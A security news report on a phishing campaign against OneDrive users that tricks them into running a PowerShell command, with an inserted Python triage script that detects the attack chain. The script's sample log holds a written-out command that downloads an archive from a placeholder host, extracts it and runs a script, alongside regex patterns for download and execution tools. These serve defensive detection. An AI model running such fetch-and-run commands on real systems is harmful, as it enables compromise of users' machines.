Sophisticated Phishing Campaign Targets Microsoft OneDrive Users

Security researchers have uncovered a sophisticated phishing campaign targeting Microsoft OneDrive users. The campaign employs advanced social engineering tactics to trick users into executing a PowerShell script, compromising their systems. 

The attack, discovered by the Trellix Advanced Research Center, begins with an email containing an HTML file urging users to resolve a DNS issue to access a OneDrive file.

Upon opening the HTML file, users are shown an image simulating a OneDrive page, displaying an error message about a DNS issue and prompting them with two buttons: “Details” and “How to fix.” Clicking “Details” directs users to a legitimate Microsoft Learn page on DNS troubleshooting. However, the “How to fix” button executes a JavaScript function within the HTML file, guiding users to open the Windows PowerShell terminal and run a specific command.

When executed, the command flushes the DNS cache and creates a folder named “downloads” on the C: drive. It then downloads an archive file, extracts its contents and runs a script. Trellix explained that this sequence of actions highlights the attackers’ use of legitimate-looking processes to deceive users into compromising their systems. 

“This combination of technical jargon and urgent error messages is a classic social engineering tactic, designed to manipulate the user’s emotions and prompt hasty action without careful consideration,” the company explained.

By decoding Base64-encoded strings within the HTML file and copying the resulting commands to the clipboard, the attackers effectively manipulate users into executing the malicious script.
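The chain described above (DNS flush, a staging folder on C:, an archive download, extraction, script execution) is routine admin activity when any one step appears alone, but rarely appears all at once in a single script block. The following triage script is an added example, not Trellix's or the article's code: it scores PowerShell script-block log lines against one regex per stage and flags a line only when several stages occur together. The tab-separated log layout, the stage names, hostnames, usernames and the `example.invalid` domain are all constructed for this example and are not taken from the campaign.

```python
"""Triage PowerShell script-block log lines for the multi-stage 'DNS fix' lure.

Added example, not Trellix's or the article's code. The log layout, field
names, stage labels and sample lines below are constructed for illustration.
"""
from __future__ import annotations

import re

# One regex per stage of the chain the article describes. The stage names
# are this example's own labels (assumption), not Trellix's terminology.
STAGE_PATTERNS = {
    "dns_flush":   re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "staging_dir": re.compile(r"\b(?:mkdir|md|New-Item)\b[^;|]*\\downloads\b", re.I),
    "download":    re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b"
                              r"|DownloadFile|DownloadString|Start-BitsTransfer"
                              r"|\bcurl\b|\bwget\b", re.I),
    "extract":     re.compile(r"Expand-Archive|ExtractToDirectory", re.I),
    "script_exec": re.compile(r"\.(?:ps1|bat|cmd|vbs|js)\b|-File\s|\biex\b|Invoke-Expression", re.I),
    "base64":      re.compile(r"FromBase64String|-enc(?:odedcommand)?\b", re.I),
}

# A single stage (flushing DNS, downloading a zip) is ordinary admin work;
# several stages inside one script block is what makes the lure stand out.
MIN_STAGES = 3


def matched_stages(command: str) -> list[str]:
    """Return the names of every stage pattern found in one command string."""
    return [name for name, pat in STAGE_PATTERNS.items() if pat.search(command)]


def is_suspicious(command: str) -> bool:
    """True when the command hits MIN_STAGES or more distinct stages."""
    return len(matched_stages(command)) >= MIN_STAGES


def parse_script_block_line(line: str) -> dict | None:
    """Parse one constructed tab-separated line: ts, host, user, ScriptBlockText.

    Returns None for lines without exactly four fields, so a truncated or
    malformed export never raises in the middle of a triage run.
    """
    parts = line.rstrip("\n").split("\t", 3)
    if len(parts) != 4:
        return None
    ts, host, user, text = parts
    return {"ts": ts, "host": host, "user": user, "text": text}


def triage(lines: list[str]) -> list[dict]:
    """Return one record per line whose command reaches MIN_STAGES, with the stages hit."""
    hits = []
    for line in lines:
        rec = parse_script_block_line(line)
        if rec is None:
            continue
        stages = matched_stages(rec["text"])
        if len(stages) >= MIN_STAGES:
            hits.append({**rec, "stages": stages})
    return hits


# Constructed sample log lines (not real telemetry). Hosts, users and the
# example.invalid domain are placeholders.
SAMPLE_LOG = [
    # The full chain from the article in one script block: flagged.
    "\t".join([
        "2024-08-01T09:12:03Z", "WS-0451", "jdoe",
        "ipconfig /flushdns; mkdir C:\\downloads; "
        "Invoke-WebRequest -Uri https://example.invalid/p.zip -OutFile C:\\downloads\\p.zip; "
        "Expand-Archive C:\\downloads\\p.zip C:\\downloads; "
        "powershell -File C:\\downloads\\run.ps1",
    ]),
    # Helpdesk flushing DNS on its own: one stage, not flagged.
    "\t".join(["2024-08-01T09:14:10Z", "WS-0452", "helpdesk", "ipconfig /flushdns"]),
    # Packaged-tool install: download plus extract is two stages, still below threshold.
    "\t".join([
        "2024-08-01T09:20:44Z", "WS-0453", "svc-deploy",
        "Invoke-WebRequest -Uri https://updates.example.invalid/tool.zip -OutFile C:\\tools\\tool.zip; "
        "Expand-Archive C:\\tools\\tool.zip C:\\tools",
    ]),
    "\t".join(["2024-08-01T09:25:00Z", "WS-0454", "asmith",
               "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"]),
    "truncated line with no tab separators",
]


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['host']} {hit['user']}: stages={hit['stages']}")
```

Run as-is it reports only the WS-0451 line. The threshold is the design choice worth tuning: lowering it to two would also flag the legitimate tool install, while keeping the `base64` stage in the table means a clipboard-pasted encoded command that skips the staging folder can still reach the threshold through the download and execution stages.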

“In a corporate setting, the impact of such an attack could extend beyond individual data breaches to include widespread network compromise, significant financial losses and severe reputational damage,” Trellix said.

The company added that the campaign highlights the constant risk of social engineering in the cybersecurity field.

“Enterprises must remain vigilant, continuously educating their workforce and reinforcing security measures to defend against such sophisticated attacks. The global distribution of this attack highlights the need for international cooperation and intelligence sharing to effectively combat these threats.”
